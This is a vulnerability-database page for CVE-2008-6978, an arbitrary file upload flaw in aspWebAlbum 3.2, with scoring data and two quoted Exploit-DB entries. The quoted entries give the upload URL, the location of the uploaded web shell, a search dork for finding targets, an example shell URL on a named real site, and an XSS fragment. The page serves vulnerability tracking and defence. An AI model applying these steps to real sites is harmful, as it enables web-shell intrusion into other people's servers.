CVE-2008-6978
published 2009-08-19CVE-2008-6978: Unrestricted file upload vulnerability in Full Revolution aspWebAlbum 3.2 allows remote attackers to execute arbitrary code by uploading a file with an…
PriorityP350medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
4.29%
89.9th percentile
Unrestricted file upload vulnerability in Full Revolution aspWebAlbum 3.2 allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in pics/, related to the uploadmedia action in album.asp.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fullrevolution | aspwebalbum | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
aspwebalbum 3.2 - Multiple Vulnerabilities
exploitdb·2008-09-10
CVE-2008-6978 aspwebalbum 3.2 - Multiple Vulnerabilities
aspwebalbum 3.2 - Multiple Vulnerabilities
---
#################################################################################################
#
#-# Discovered by Alemin_Krali #
#
#-# aspWebAlbum 3.2 #
#
#-# Script Download "http://www.fullrevolution.com" #
#
#-# aspWebAlbum 3.2 Single Site License | $60.00 : ) #
#
#-# HomePage al3m.blogspot.com #
#
#-# [email protected] #
#
#-# Dork ? : album.asp?pic= .jpg cat= #
#
#
#
#--# 1-Arbitrary File Upload Exploit [AspWebAlbum All Versions] #
#
http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name! #
#
and your shell adress: #
#
http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp #
#
#
ex:1 #
http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp #
#
ex:2
Exploit-DB
aspwebalbum 3.2 - Arbitrary File Upload / SQL Injection / Cross-Site Scripting
exploitdb·2008-09-03
CVE-2008-6978 aspwebalbum 3.2 - Arbitrary File Upload / SQL Injection / Cross-Site Scripting
aspwebalbum 3.2 - Arbitrary File Upload / SQL Injection / Cross-Site Scripting
---
##################################################################################################
#
#-# Discovered bay Alemin_Krali alert('xss')&from=login #
#
#################################################################################################
# milw0rm.com [2008-09-03]
No writeups or analysis indexed.
http://osvdb.org/47913http://secunia.com/advisories/31649http://www.securityfocus.com/bid/30996https://exchange.xforce.ibmcloud.com/vulnerabilities/44876https://www.exploit-db.com/exploits/6357https://www.exploit-db.com/exploits/6420http://osvdb.org/47913http://secunia.com/advisories/31649http://www.securityfocus.com/bid/30996https://exchange.xforce.ibmcloud.com/vulnerabilities/44876https://www.exploit-db.com/exploits/6357https://www.exploit-db.com/exploits/6420
2009-08-19
Published